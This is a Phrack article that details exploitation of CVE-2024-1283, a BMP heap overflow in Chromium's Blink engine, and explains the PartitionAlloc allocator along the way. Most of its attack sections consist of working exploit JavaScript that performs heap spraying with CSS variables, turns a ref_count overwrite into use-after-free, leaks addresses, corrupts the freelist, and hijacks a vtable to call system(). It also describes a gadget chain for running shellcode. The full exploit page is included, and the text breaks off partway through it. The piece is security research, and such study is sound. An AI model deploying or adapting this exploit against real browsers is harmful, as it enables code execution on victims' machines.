Title : Allocating new exploits
Author : r3tr074
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x0A of 0x11
|=----------------------------------------------------------------------=|
|=---------------=[ Allocating new exploits ]=----------------=|
|=----------------------------------------------------------------------=|
|=-----------------=[ Pwning browsers like a kernel ]=------------------=|
|=----------=[ Digging into PartitionAlloc and Blink engine ]=----------=|
|=----------------------------------------------------------------------=|
|=----------------------------=[ r3tr074 ]=-----------------------------=|
|=---------------------------=[ [email protected] ]=----------------------------=|
|=----------------------------------------------------------------------=|
"He who fights with monsters might
take care lest he thereby become a
monster. And if you gaze for long
into an abyss, the abyss gazes
also into you."
- Friedrich Nietzsche
---[ Index
0 - Introduction
1 - Chromium rendering engine overview
2 - Case study: BMP 0day
2.1 - Bug power, the primitives
3 - PartitionAlloc, the memory allocator
3.1 - PartitionAlloc security guarantees
4 - Exploitation
5 - Takeaways, advances, etc etc etc
6 - References
5 - Exploit code
---[ 0 - Introduction
This article will try to explain a lot about chrome, blink and
PartitionAlloc internals and apply all this knowledge to transform an
extremely restricted bug into arbitrary code execution.
The vulnerability in question is CVE-2024-1283, a heap overflow in the
Blink engine that occurs when decoding BMP images. Using a couple of new
techniques very similar to recent Linux kernel tricks like elastic heap
objects and cross-cache overflow, we can abuse PartitionAlloc and exploit,
in theory, any memory write bug, resulting in full shellcode execution.
---[ 1 - Chromium rendering engine overview
Chromium, and all Chromium-based browsers, use the "Blink rendering
engine" [1]. This component is responsible for much of what happens
within the renderer process, such as parsing HTML, CSS, decoding
images, and more.
"A browser engine (also known as a layout engine or rendering engine)
is a core software component of every major web browser. The primary
job of a browser engine is to transform HTML documents and other
resources of a web page into an interactive visual representation
on a user's device." [2]
Blink is used by Chromium, but is considered a separate library. Its code
can be found within the Chromium source at `src/third_party/blink`, and
its own repository can be found here [3].
While it is the responsibility of Blink, not all major functions are
necessarily written in its code. For example, executing JavaScript is
necessary for a rendering engine, but not all of the JS engine is part
of the main code.
This is the case with V8, the JavaScript engine used, which is separate
in the code at `v8/`. It also has its own repository [4]. The same applies
to some image formats [5] and video formats [6]. However, other image
formats are entirely processed by Blink, such as "BMP", "AVIF", and some
others.
We can see them in `src/third_party/blink/renderer/platform/image-decoders`
---[ 2 - Case study: BMP 0day
After spending some time fuzzing these isolated image formats, I was able
to find a very interesting bug, a "heap-overflow" within BMPImageDecoder
(ASAN shows it as if the overflow happened within Skia, resulting in an
incorrect title for the CVE [7]). Let's understand how this bug occurs,
and what its primitives are! We can start by analyzing the
ASAN stack trace:
r3tr0@chrome:~/fuzz/bmp$ cat /tmp/bad.bmp | ./test-crash
=875756 ERROR: AddressSanitizer: heap-buffer-overflow on address[redacted]
READ of size 32 at 0x521000001100 thread TO
#0 0xdead in unsigned int vector [8] skcms_private::hsw::load()
#1 0xdead in skcms_private::hsw::Exec_load_8888_k()
#2 0xdead in skcms_private::hsw::Exec_load_8888()
#3 0xdead in skcms_private:: hsw::exec_stages ()
#4 0xdead in skcms_private::hsu::run_program()
#5 0xdead in skcms_Transform
#6 0xdead in blink::BMPImageReader::ColorCorrectCurrentRow()
#7 0xdead in blink::BMPImageReader::ProcessRLEData()
#8 0xdead in blink::BMPImageReader::DecodePixelData(bool)
#9 0xdead in blink::BMPImageReader::DecodeBMP(bool)
#10 0xdead in blink::BMPImageDecoder::DecodeHelper(bool)
#11 0xdead in blink::BMPImageDecoder::Decode(bool)
#12 0xdead in blink::ImageDecoder::DecodeFrameBufferAtIndex()
[redacted]
The last function within blink is BMPImageReader::ColorCorrectCurrentRow().
We can see a snippet of this function below:
void BMPImageReader::ColorCorrectCurrentRow() {
...
// address calc here
ImageFrame::PixelData* const row = buffer_->GetAddr(0, coord_.y());
...
const bool success =
skcms_Transform(row, fmt, alpha, transform->SrcProfile(), row, fmt, alpha,
transform->DstProfile(), parent_->Size().width());
DCHECK(success);
buffer_->SetPixelsChanged(true);
}
With a little debugging help, we can conclude that there is an address
calculation error in `buffer_->GetAddr(0, coord_.y());`, where this
function ends up being resolved to this other inline function:
const uint32_t* addr32(int x, int y) const {
SkASSERT((unsigned)x < (unsigned)fInfo.width());
SkASSERT((unsigned)y < (unsigned)fInfo.height());
return (const uint32_t*)((const char*)this->addr32() + (size_t)y * fRowBytes + (x << 2));
}
This function can also be summarized in a single line
`this->addr32() + y * fRowBytes + (x << 2)`.
Somehow `coord_.y()` is equal to -1 in the iteration that causes a crash,
and if we resolve this calculation with this value we can understand why:
this->addr32() + y * fRowBytes + (x << 2);
base_addr + -1 * fRowBytes + (0 << 2);
base_addr - fRowBytes;
Assuming the variables we know, `this->addr32()` is the base address of
the image decoding chunk, y is -1, and x is equal to 0.
Thus, the result will be the base address minus fRowBytes, resulting in
an address pointing behind the start of the chunk, and the function
subsequently called within Skia that effectively writes into this input
buffer. We can treat this like a `memcpy`. The flaw is not in the
function but in what is passed to it.
Looking at the patch [8] makes it clearer why this happens. It's a simple
off-by-one bug, where the `ColorCorrectCurrentRow()` function is called
one more time than expected. Since decoding occurs `top_down`, with
each iteration 1 is subtracted from y, instead of ending at 0, the next
iteration happens and subtracting y once again turns it into -1.
----[ 2.1 - Bug power, the primitives
Very good, but what kind of primitives does this bug give us? Where and
what can we write? Analyzing the `skcms_Transform` function, it receives
a kind of "bytecodes" for an image transformation VM. The important part
is that we don't control the bytecode sent, only the input buffer, so we
can't control what is written. Let's analyze an example at runtime and
see what happens:
pwndbg> x/6gx $rdi
0x1180136a000: 0x4141414141414141 0x4242424242424242
0x1180136a010: 0x4343434343434343 0x4444444444444444
0x1180136a020: 0x4545454545454545 0xff00ff00ff00ff00
pwndbg> continue
[redacted]
pwndbg> x/6gx 0x1180136a000
0x1180136a000: 0x4100000041000000 0x4200000042000000
0x1180136a010: 0x4300000043000000 0x4400000044000000
0x1180136a020: 0x4500000045000000 0xff00ff00ff00ff00
Basically, we can only write null bytes with the exception of bytes 0xff
which are ignored. The most-significant-byte of every 4 bytes is also
ignored. These are quite limited writing primitives, but still powerful.
Now that we know what we can write, let's see where we can write. Going
back to the address calculation, the only variable we haven't talked about
is fRowBytes.
In our case this variable is always 1/4 of the chunk size, which we can
partially control using the height and width of the image. This results
in a partial overflow of the end of the last chunk, assuming the BMP image
chunk has 0x1000 bytes, the last 0x400 bytes will be corrupted:
0x400 bytes corrupted
\ /
+---------------------+--------------------+
| |XXXXX| |
| Another chunk |XXXXX| BMP chunk(0x1000) |
| |XXXXX| |
+---------------------+--------------------+
Now everything seems like a lost cause, since we can only write null bytes.
The best idea is to overwrite a `ref_count_` property, but all of them are
located at the beginning of the chunk. To move forward, we need to better
understand how Chromium's custom memory allocator works.
---[ 3 - PartitionAlloc, the memory allocator
"PartitionAlloc is a memory allocator optimized for space efficiency,
allocation latency, and security." [9] (and developed by Google and used
in Chromium by default)
Quickly, we can highlight the most important things about PartitionAlloc:
- It's a SLAB allocator, which means it pre-allocates memory and
organizes it into fixed-size chunks, which is very important from
a security perspective.
- There's a thread cache, like tcache in glibc heap.
- There are some "soft-protections" against certain types of memory
management bugs, like double-free.
- After freeing a slot, the freelist pointer is written in
big-endian at the beginning of this slot.
>> When exploring a SLAB allocator, similar to the kernel, we expect a
very direct exploitation path. Only objects of the same size are
allocated adjacent to each other. Therefore, the vulnerable object
and the victim must share the same size or similar.
Everything in PartitionAlloc is allocated within "pages", which can be:
- System Page
A page defined by the OS, typically 4KiB, but supports up to 64KiB.
- Partition Page
Consists of exactly 4 system pages.
- Super Page
A 2MiB region, aligned on a 2MiB boundary.
- Extent
An extent is a run of consecutive super pages.
System Page
^
+------+
| |
+------+
Partition Page
^
+------+------+------+------+
| | | | |
+------+------+------+------+
Super page (2MiB)
^
+-----------------------------------------------------+
| |
+-----------------------------------------------------+
Within each Super Page, several Partition Pages are allocated, where the
smallest memory units can be divided into:
- Slot: is a single unit chunk
- Slot span: is a run of same-sized chunks
- Bucket: Chains slot spans containing slots of similar size
+-------------------+ +------------------+ +-------------+
|...| PartitionPage | -> | SlotSpanMetadata | -> |freelist_head|
+-------------------+ +------------------+ |-------------|
\ / | bucket |
\ / +-------------+
\ / |
\ / V
+--------------------------------------------------+ +------------------+
| | | | | | | | Partition Bucket |
| Guard | Metadata | Guard | N pages | ... | Guard | +------------------+
| | | | | | |
+--------------------------------------------------+
Super Page
An entire Super Page is allocated as follows: Right at the beginning there
are 3 pages (2 "Guard Pages" which are pages with PROT_NONE to prevent any
kind of linear corruption, and a Metadata page between the other two). This
page has a list of "Partition Pages", which is a struct that controls some
information about the Partition Pages. It also has the SlotSpanMetadata
property, which, besides the freelist_head of that span, has the pointer
to that Bucket.
+------------------+
| Partition Bucket |-------+ +----+
+------------------+ | | |
v | v
+--------------------------------------------------+
| | | | | | |
| Guard | Metadata | Guard | N pages | ... | Guard |
| | | | | | |
+--------------------------------------------------+
Each Partition Bucket is a linked list to other buckets of similar sizes.
This is a single slot
| +-----------------+
+------->|0x1000|0x1000|...|
|-----------------| -> this is a slot span
|0x1000|0x1000|...|
+-----------------+
\ /
\ /
\ /
\ /
+--------------------------------------------------+
| | | | | | |
| Guard | Metadata | Guard | N pages | ... | Guard |
| | | | | | |
+--------------------------------------------------+
Each Slot Span can be composed of N Partition Pages and has several slots
of exactly the same size adjacent.
PartitionAlloc also has a per-thread cache. It is built to meet the needs
of most common allocations and avoid performance loss in the central
allocator that requires a context lock to prevent two allocations from
returning the same slot.
"The thread cache has been tailored to satisfy a vast majority of
requests by allocating from and releasing memory to the main allocator
in batches, amortizing lock acquisition and further improving locality
while not trapping excess memory." [10]
----[ 3.1 - PartitionAlloc security guarantees
When looking from a security perspective, PartitionAlloc delivers some
guarantees:
1. Linear overflows/underflows cannot corrupt into, out of, or between
partitions. There are guard pages at the beginning and the end of
each memory region owned by a partition.
2. Linear overflows/underflows cannot corrupt the allocation metadata.
PartitionAlloc records metadata in a dedicated, out-of-line region
(not adjacent to objects), surrounded by guard pages. (Freelist
pointers are an exception.)
3. Partial pointer overwrite of freelist pointer should fault.
4. Direct map allocations have guard pages at the beginning and the end.
5. One page can contain only objects from the same bucket. Even after
this page is completely freed
If we look closely, guarantees 1 and 2 basically prevent corruptions
against the Metadata Page and overflow between Super Pages. This is the
job of the "Guard Page" mentioned above, a memory page with the PROT_NONE
protection, which will cause a crash when trying to read, write, or
execute anything within that page.
Guarantee 3 simply involves storing the freelist pointer in big-endian
format. So by partially corrupting this pointer, converting it to little
endian would completely change the pointer.
Guarantee 4 is just a variation of guarantees 1 and 2, where, if it is
necessary to allocate a very large chunk that does not fit into a common
Super Page, this memory is allocated directly by mapping memory. This
mapped memory is again placed between two "Guard Pages", one at
the beginning and one at the end.
Finally, guarantee 5 is useful against type confusion attacks and attempts
to abuse a UAF between pages.
So, if you paid attention, there are no guarantees or protections that
prevent two buckets of completely different sizes from being allocated
adjacent to each other without any kind of red zone between them (as is
the case of Guard Pages between Super Pages). Therefore, it is entirely
possible and stable to create this layout:
vuln obj size=0x1000 victim obj size=0x4000
+----------+ +----------+
| ... | | victim |
|----------| |----------|
| vuln | | ... |
+----------+ +----------+
\ \ / /
\ \ / /
\ \ / /
\ \/ /
+---------------------------------------------------+
| | | | | | | |
| G | M | G | 2 pages | 3 pages | ...N pages | G |
| | | | | | | |
+---------------------------------------------------+
Testing the hypothesis, I could verify that we can create extremely stable
memory layouts with the same objects of different sizes adjacent to each
other.
---[ 4 - Exploitation
With the possibility of overflowing into any other slot of a different
size, we just need to find an interesting target. We could search for an
object with a |length_| property, but since we can only write null bytes,
I believe we can take more advantage of the bug by attacking a
|ref_count_| property. Looking for references of good targets, we can
follow existing work used to exploit the well-known "The WebP 0day" [11].
Objects and structures in CSS are allocated by Blink itself. Among these
objects is CSSVariableData, which represents the value of variables within
CSS [12]. It seems to be a great target for several reasons:
- It's an elastic object, so we can force it to fit in our case or any
other; this object can vary in size between 16 bytes and
2097152 bytes (`kMaxVariableBytes`).
- It's a "ref counted" object.
- It doesn't have any pointers that could cause a crash when
dereferenced.
In `css_variable_data.h`, we can see the description of the object:
class CORE_EXPORT CSSVariableData : public RefCounted<CSSVariableData> {
...
private:
...
// 32 bits refcount before this.
// We'd like to use bool for the booleans, but this causes the struct to
// balloon in size on Windows:
// https://randomascii.wordpress.com/2010/06/06/bit-field-packing-with-visual-c/
// Enough for storing up to 2MB (and then some), cf. kMaxSubstitutionBytes.
// The remaining 4 bits are kept in reserve for future use.
const unsigned length_ : 22;
const unsigned is_animation_tainted_ : 1; // bool.
const unsigned needs_variable_resolution_ : 1; // bool.
const unsigned is_8bit_ : 1; // bool.
unsigned has_font_units_ : 1; // bool.
unsigned has_root_font_units_ : 1; // bool.
unsigned has_line_height_units_ : 1; // bool.
const unsigned unused_ : 4;
In memory, this object reflects this layout:
0 4 8 16
+------------+----------+-+-------------------------+
| ref_count_ | length_ |F| String content |
+------------+----------+-+-------------------------+
| String content... |
+---------------------------------------------------+
> F = flags
And the code that allocates this object can be found in the same file:
// third_party/blink/renderer/core/css/css_variable_data.h:34
static scoped_refptr<CSSVariableData> Create(StringView original_text,
bool is_animation_tainted,
bool needs_variable_resolution,
bool has_font_units,
bool has_root_font_units,
bool has_line_height_units) {
if (original_text.length() > kMaxVariableBytes) {
// This should have been blocked off during variable substitution.
NOTREACHED();
return nullptr;
}
wtf_size_t bytes_needed =
sizeof(CSSVariableData) + (original_text.Is8Bit()
? original_text.length()
: 2 * original_text.length());
void* buf = WTF::Partitions::FastMalloc(
bytes_needed, WTF::GetStringWithTypeName<CSSVariableData>());
return base::AdoptRef(new (buf) CSSVariableData(
original_text, is_animation_tainted, needs_variable_resolution,
has_font_units, has_root_font_units, has_line_height_units));
}
Well, it seems like a great target, but now we need to discuss which
bucket this object will be allocated in. Due to the thread cache, the
objects won't be placed together. We need to force the thread cache to
clear the bucket so that our vulnerable object and victim share the same
Super Page. Luckily, this is quite simple to do. We just need to fill the
cache up to the "limit", as can be seen in this comment:
// base/allocator/partition_allocator/src/partition_alloc/thread_cache.cc:586
// For each bucket, there is a |limit| of how many cached objects there are in
// the bucket, so |count| < |limit| at all times.
// - Clearing: limit -> limit / 2
// - Filling: 0 -> limit / kBatchFillRatio
The code that executes this subroutine can be seen below:
// base/allocator/partition_allocator/src/partition_alloc/thread_cache.h:511
PA_ALWAYS_INLINE bool ThreadCache::MaybePutInCache(uintptr_t slot_start,
size_t bucket_index,
size_t* slot_size) {
PA_REENTRANCY_GUARD(is_in_thread_cache_);
...
auto& bucket = buckets_[bucket_index];
...
uint8_t limit = bucket.limit.load(std::memory_order_relaxed);
// Batched deallocation, amortizing lock acquisitions.
if (PA_UNLIKELY(bucket.count > limit)) {
ClearBucket(bucket, limit / 2);
}
...
Now let's create this layout with JS. How can we manipulate these objects
to create a perfect layout?
First, let's force the allocation of a new Super Page to have more
control, for this, we can simply do several sprays
let div0 = document.getElementById('div0');
for (let i = 0; i < 30; i++) {
div0.style.setProperty(`--sprayA${i}`, kCSSString);
div0.style.setProperty(`--sprayC${i}`, kCSSStringCross0x2000);
div0.style.setProperty(`--sprayB${i}`, kCSSStringHRTF);
}
After that, let's force object A to be adjacent to C. Object B should be
allocated close, but not adjacent to, the others as it will be useful for
acquiring memory leaks.
for (let i = 0; i < 50; i++) {
for (let j = 0; j < 4; j++) {
// spraying allocation of 2 different size spans
// very close to 100% of attempts, the same object is allocated
// after a different sized slot
const CSSValName = `${i}.${j}`.padEnd(0x7fcc, 'A');
div0.style.setProperty(`--a${i}.${j}`, CSSValName);
const CSSValName2 = `${i}.${j}`.padEnd(0x1fcc, 'C');
div0.style.setProperty(`--c${i}.${j}`, CSSValName2);
}
for (let j = 0; j < 64; j++) {
const CSSValName = `${i}.${j}`.padEnd(0x414, 'B');
div0.style.setProperty(`--b${i}.${j}`, CSSValName);
}
}
And finally, let's clear the bucket to finish preparing our layout:
for (let i = 10; i < 30; i++) {
div0.style.removeProperty(`--a${i}.2`);
}
for (let i = 46; i > 20; i--) {
div0.style.removeProperty(`--c${i}.0`);
}
gc(); await sleep(500);
Now, after creating the correct heap layout, we will overwrite the
`ref_count_`, trigger a free, and allocate a fully controllable data
object over the victim object, thus creating a UAF condition.
We can abuse our conditional writing of null bytes. If you recall
that 0xff bytes are ignored, so we can increase the `ref_count_` to
`0xff01` and trigger the vulnerability. After this, the ref count will
be `0xff00`, and calling `gc();` will free this object while we still
have an active reference.
>> Remember: Actually, the `ref_count_` starts with 2, so we need to
increase this to `0xff02`, otherwise the ref_count will reach in -1
and cause a crash
+------------+----------+-+-------------------------+
| 2 | 0x2000 |F| "AAAAAAAAAAAA" |
+------------+----------+-+-------------------------+
| "AAAAAAAAAAAA..." |
+---------------------------------------------------+
|
| increase `ref_count_` (+0xff00)
|
v
+------------+----------+-+-------------------------+
| 0xff02 | 0x2000 |F| "AAAAAAAAAAAA" |
+------------+----------+-+-------------------------+
| "AAAAAAAAAAAA..." |
+---------------------------------------------------+
|
| Trigger vuln
|
v
+------------+----------+-+-------------------------+-------------------+
| 0xff00 | 0x0000 |F| "A\x00\x00\x00" | |
+------------+----------+-+-------------------------+ BMP vuln chunk... |
| "A\x00\x00\x00..." | |
+---------------------------------------------------+-------------------+
|
| Call `gc();` and decrease
| `ref_count_` (-0xff00)
v
+-------------------------+-------------------------+
| freelist ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
Perfect! We can use any object to consume this freelist entry and overwrite
the |length_| property. For this, we will use an AudioArray that we can
control entirely. AudioArray is also an elastic object that has been used
to exploit another type of UAF previously [13].
Now we can OOB read:
fetch("/bad.bmp").then(async response => {
let rs = getComputedStyle(div0);
let imageDecoder = new ImageDecoder({
data: response.body,
type: "image/bmp"
});
increase_refs(0xff02); // overflow will overwrite 0xff02 to 0xff00
imageDecoder.decode().then(async () => {
gc(); gc();
await sleep(2500);
let ab = new ArrayBuffer(0x600);
let view = new Uint32Array(ab);
// fake CSSVariableData
view[0] = 1; // ref_count
const newCSSVarLen = 0x19000;
view[1] = newCSSVarLen | 0x01000000; // length and flags, set is_8bit_
for (let i = 2; i < view.length; i++)
view[i] = i;
await allocAudioArray(0x2000, ab, 1);
leak();
})
});
async function leak() {
console.log("continuing...");
let div0 = document.getElementById('div0');
let rs = getComputedStyle(div0);
let CSSLeak = rs.getPropertyValue(kTargetCSSVar).substring(0x15000 - 8);
console.log(CSSLeak.length.toString(16));
...
Good, but not enough, we've defeated any ASLR, but now we need a control
flow hijacking idea. Instead of looking for more good victim objects, we
can directly attack PartitionAlloc again and corrupt the freelist pointer.
The idea is to create a double-free condition, which will result in an
circular freelist and ultimately overwrite the pointer.
CSSVariableData and AudioArray essentially point to the same address, so
we can cause both of them be freed and cause a "double-free". If we do
this, the freelist pointer written in the chunk will point to itself:
+----------+
| | It's pointing at itself
| v
| +-------------------------+-------------------------+
+----| freelist ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
This circular freelist is extremely powerful, because we can use the same
AudioBuffer as before to corrupt the freelist pointer. The next allocation
request will return the pointer we want, giving us an arbitrary write.
+----------+
| | It's pointing at itself
| v
| +-------------------------+-------------------------+
+----| freelist ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
|
| Alloc an AudioArray and corrupt freelist
|
v
+-------------------------+-------------------------+
| corrupted ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
The only restriction for the corrupted pointer is that it must be from
within the same Super Page. To achieve code execution, we will deallocate
object B and allocate objects that have vtables, then corrupt the
freelist to point to one of these objects. This way, we can corrupt the
vtable pointer and easily gain control flow hijack. Follow snipped of
exploit alloc the vtable object and leaks its address:
CSSVars = [
// this regex is used to find the B objects in memory
// the pattern match with: 0x2000 + flags + "${i}.${j}" + "BBBBB..."
...CSSLeak.matchAll(/\x02\x00\x00\x00\x14\x04\x00\x01(\d+\.\d+)/g)
];
...
for (let i = 0; i < kSprayPannerCount; i++) {
panners.push(audioCtx.createPanner());
}
for (let i = 0; i < kSprayPannerCount; i++) {
// i really idk why, but i need add the ref_count_ and remove the
// prop to trigger free
rs.getPropertyValue(`--b${CSSVars[i][1]}`);
div0.style.removeProperty(`--b${CSSVars[i][1]}`);
}
gc(); gc(); await sleep(1000);
for (let i = 0; i < panners.length; i++) {
// allocating objects with vtables
panners[i].panningModel = 'HRTF';
}
// free two panners after target CSSVariableData
panners[kSprayPannerCount - 2].panningModel = 'equalpower';
panners[kSprayPannerCount - 1].panningModel = 'equalpower';
await sleep(1000);
let hrtfLeak = rs.getPropertyValue(kTargetCSSVar).substring(0x15000 - 8);
And now just create the fake vtable and profit!!
let ab = new ArrayBuffer(0x600);
let abFakeObj = new ArrayBuffer(0x600);
let view = new BigUint64Array(ab);
let viewFakeObj = new DataView(abFakeObj);
view[0] = swapEndian(fakePannerAddr - 0x10n);
for (let i = 0; i < viewFakeObj.byteLength; i++)
viewFakeObj.setUint8(i, 0x4a); // "J"
const system_addr = chromeBase + kSystemLibcOffset;
// call qword ptr [rax + 8]
viewFakeObj.setBigUint64(0x0, fakePannerAddr + 8n - 8n, true);
// viewFakeObj.setBigUint64(8, 0xdeadbeefn, true);
viewFakeObj.setBigUint64(0x8, chromeBase + kWriteListenerOffset, true);
// fake BindState addr
viewFakeObj.setBigUint64(0x10, fakePannerAddr + 0x18n, true);
// start of fake BindState
// The first int64 are the value which will passed to function address
// in second int64
viewFakeObj.setBigUint64(0x18 + 0,
// 0x636c616378 == xcalc
0x636c616378n /* -1 because ref_count_ + 1 */ - 1n, true);
viewFakeObj.setBigUint64(0x18 + 0x8, system_addr, true);
In this case, I simply use a simple `system("xcalc")`.
For a more complex exploit, we can use a sequence of more complete gadgets.
Chromium has some super powerful gadgets that allow executing shellcode
easily. You can use `blink::FileSystemDispatcher::WriteListener::DidWrite`,
followed by a fake `BindState`. With these two, we can call any function
by controlling RDI, that is, the first argument of the function.
By combining with `content::ServiceWorkerContextCore::OnControlleeRemoved`,
we can choose a function and N arguments. With this power, we call the
function `v8::base::AddressSpaceReservation::SetPermissions` and assign it
to a memory page RWX. The only thing we need to do is corrupt a second
object with a vtable and make it point to this RWX page after copying some
shellcode to it.
If you want to see a full exploit using these techniques, you can check out
the previously mentioned exploits here [11] [13].
---[ 5 - Takeaways, advances, etc etc etc
This article attempts to dissect the most important points about
PartitionAlloc and explain recent techniques like
"double-free2arbitrary-allocation", and completely new techniques like
"cross-bucket overflow".
These techniques can be used, in theory, to exploit any memory corruption
bug in PartitionAlloc, which is fascinating for weaponizing seemingly
insufficient bugs. Many of these techniques are reminiscent of tricks from
recent years in the kernel exploit scene, such as "elastic-objects" and
"cross-cache overflow". High-performance allocators tend to share
vulnerabilities inherent in their operation and performance.
As mentioned above, the memory allocator is an extremely critical
component in high-performance software like a browser, and it must be
extremely simple and fast. This simplicity comes at a cost in security.
Chromium has great security measures like "safe libc++" that can prevent
a large number of vulnerabilities, but after the first memory corruption,
the attacker's scenario is very privileged and few things can stop them.
All recent new mitigations have been focused on mitigating memory
corruptions coming from the JS engine, as is the case with the
well-crafted V8 sandbox. However, this is not enough. Although JavaScript
is an extremely bug-prone subsystem, many other areas continue to have
little research coverage.
---[ 6 - References
[1] https://www.chromium.org/blink/#what-is-blink
[2] https://en.wikipedia.org/wiki/Browser_engine
[3] https://chromium.googlesource.com/chromium/blink/
[4] https://chromium.googlesource.com/v8/v8/
[5] http://libpng.org/
[6] https://chromium.googlesource.com/webm/libvpx/
[7] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-1283
[8] https://chromium-review.googlesource.com/c/chromium/src/+/5241305/7/
third_party/blink/renderer/platform/image-decoders/bmp/bmp_image_reader.cc
[9] https://chromium.googlesource.com/chromium/src/+/master/base/
allocator/partition_allocator/PartitionAlloc.md#overview
[10] https://chromium.googlesource.com/chromium/src/+/master/base/
allocator/partition_allocator/PartitionAlloc.md#performance
[11] https://www.darknavy.org/blog/exploiting_the_libwebp_vulnerability_part_2/
[12] https://developer.mozilla.org/en-US/docs/Web/CSS/Using_CSS_custom_properties
[13] https://securitylab.github.com/research/one_day_short_of_a_fullchain_renderer/
---[ 7 - Exploit Code
<!-- ./chrome --no-sandbox --headless --user-data-dir=/tmp/not-exist \
--disable-gpu --remote-debugging-port=9222 --enable-logging=stderr \
http://localhost:8000/exploit.html
-->
<html>
<head>
<script>
const kHRTFPannerVtableOffset = 0x10e5570n;
const kHRTFPannerHeapOffset = 0x22620n;
// blink::FileSystemDispatcher::WriteListener::DidWrite
const kWriteListenerOffset = -0xd401d0n;
// this can be used to more complex exploitation giving RWX perm and
// writing a shellcode, this is a minimal POC which only pop xcalc
// blink::FileSystemDispatcher::WriteListener::DidWrite
// const kPolymorphicInvokeOffset = 0xe1cde26n;
// const kRetOffset = kWriteListenerOffset + 104n; // ret instruction
// v8::base::AddressSpaceReservation::SetPermissions
// const kOSSetPermissionsOffset = -0x5a09080n;
// const kShellcode = [
// 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc
// ];
const kSystemLibcOffset = -0x31af290n;
// this string size +0x34, fits into 0x400 bucket
const kCSSStringCross0x2000 = 'C'.repeat(0x1fcc);
// HRTFPanner sized 0x448, fits into 0x500(?) bucket
const kCSSStringHRTF = 'B'.repeat(0x414); // 0x414 + 0x34 == 0x448
const kCSSString = 'A'.repeat(0x7fcc);
const kSprayPannerCount = 10;
const kTargetCSSVar = '--c13.2';
const audioCtx = new OfflineAudioContext(1, 4096, 4096);
var panners = [];
var audioCtxArr = [];
var delayNodeArr = [];
var srcNodeArr = [];
var heapAddr = -1n;
var fakePannerAddr = -1n;
var chromeBase = -1n;
function die(msg) {
console.log(msg);
throw msg;
}
function str2ab(str) {
let buf = new ArrayBuffer(str.length);
let view = new Uint8Array(buf);
for (let i = 0; i < str.length; i++) {
view[i] = str.charCodeAt(i);
}
return buf;
}
function u64(str, is_little_endian = true) {
if (str.length != 8)
die('string length is not 8');
let ab = str2ab(str);
let view = new DataView(ab);
return view.getBigUint64(0, is_little_endian);
}
function swapEndian(n) {
let view = new DataView(new ArrayBuffer(8));
view.setBigUint64(0, n, true);
return view.getBigUint64(0, false);
}
// function sleep(ms) {
// var start = new Date().getTime();
// while (new Date().getTime() < start + ms) { /* wait */ }
// }
function sleep(ms) {
return new Promise(resolve => setTimeout(resolve, ms));
}
function gc() {
let x = [];
for (let i = 0; i < 200; i++) {
x.push(new Array(1024 * 1024));
}
}
function increase_refs(ref_count_) {
let rs = getComputedStyle(div0);
// the default ref_count_ is 2
for (let i = 0; i < ref_count_ - 2; i++) {
rs.getPropertyValue(kTargetCSSVar);
}
}
async function allocAudioArray(size, data, count) {
const delay = ((size - 0x20) / 4 - 0x80) / 4096;
const prevCount = audioCtxArr.length;
for (let i = 0; i < count; i++) {
let audioCtxDelay = new OfflineAudioContext(1, 4096, 4096);
// will alloc ((delay * 4096 * 1024) / 1024 + 0x80) * 4 + 0x20
let delayNode = audioCtxDelay.createDelay(delay);
audioCtxArr.push(audioCtxDelay);
delayNodeArr.push(delayNode);
}
// FIXME: only the first 0x600 is controled now
// buffer content is getting weird when size is big
if (data.byteLength > 0x600)
die('data too long for Audio Array');
let buffer = audioCtx.createBuffer(1, 0x600, 4096);
let dstData = buffer.getChannelData(0);
new Uint8Array(dstData.buffer).set(new Uint8Array(data));
for (let i = 0; i < count; i++) {
let audioCtxDelay = audioCtxArr[prevCount + i];
let delayNode = delayNodeArr[prevCount + i];
let srcNode = audioCtxDelay.createBufferSource();
srcNodeArr.push(srcNode);
srcNode.buffer = buffer;
srcNode.connect(delayNode).connect(audioCtxDelay.destination);
// audioCtxDelay.suspend(1);
audioCtxDelay.suspend(0x600 / 4096.0);
srcNode.start();
audioCtxDelay.startRendering();
}
await sleep(500);
}
async function pwn() {
console.log("start");
let div0 = document.getElementById('div0');
for (let i = 0; i < 30; i++) {
div0.style.setProperty(`--sprayA${i}`, kCSSString);
div0.style.setProperty(`--sprayC${i}`, kCSSStringCross0x2000);
div0.style.setProperty(`--sprayB${i}`, kCSSStringHRTF);
}
for (let i = 0; i < 50; i++) {
for (let j = 0; j < 4; j++) {
// spraying allocation of 2 different size spans
// very close to 100% of attempts, the same object is allocated
// after a different sized slot
const CSSValName = `${i}.${j}`.padEnd(0x7fcc, 'A');
div0.style.setProperty(`--a${i}.${j}`, CSSValName);
const CSSValName2 = `${i}.${j}`.padEnd(0x1fcc, 'C');
div0.style.setProperty(`--c${i}.${j}`, CSSValName2);
}
for (let j = 0; j < 64; j++) {
const CSSValName = `${i}.${j}`.padEnd(0x414, 'B');
div0.style.setProperty(`--b${i}.${j}`, CSSValName);
}
}
for (let i = 10; i < 30; i++) {
div0.style.removeProperty(`--a${i}.2`);
}
for (let i = 46; i > 20; i--) {
div0.style.removeProperty(`--c${i}.0`);
}
gc(); await sleep(500);
console.log("overflowing...");
fetch("/bad.bmp").then(async response => {
let rs = getComputedStyle(div0);
let imageDecoder = new ImageDecoder({
data: response.body,
type: "image/bmp"
});
increase_refs(0xff02); // overflow will overwrite 0xff02 to 0xff00
imageDecoder.decode().then(async () => {
gc(); gc();
await sleep(2500);
let ab = new ArrayBuffer(0x600);
let view = new Uint32Array(ab);
// fake CSSVariableData
view[0] = 1; // ref_count
const newCSSVarLen = 0x19000;
// kMaxVariableBytes
// console.assert(newCSSVarLen <= 2097152, 'CSSLen too long');
// length and flags, set is_8bit_
view[1] = newCSSVarLen | 0x01000000;
for (let i = 2; i < view.length; i++)
view[i] = i;
await allocAudioArray(0x2000, ab, 1);
leak();
})
});
}
async function leak() {
console.log("continuing...");
let div0 = document.getElementById('div0');
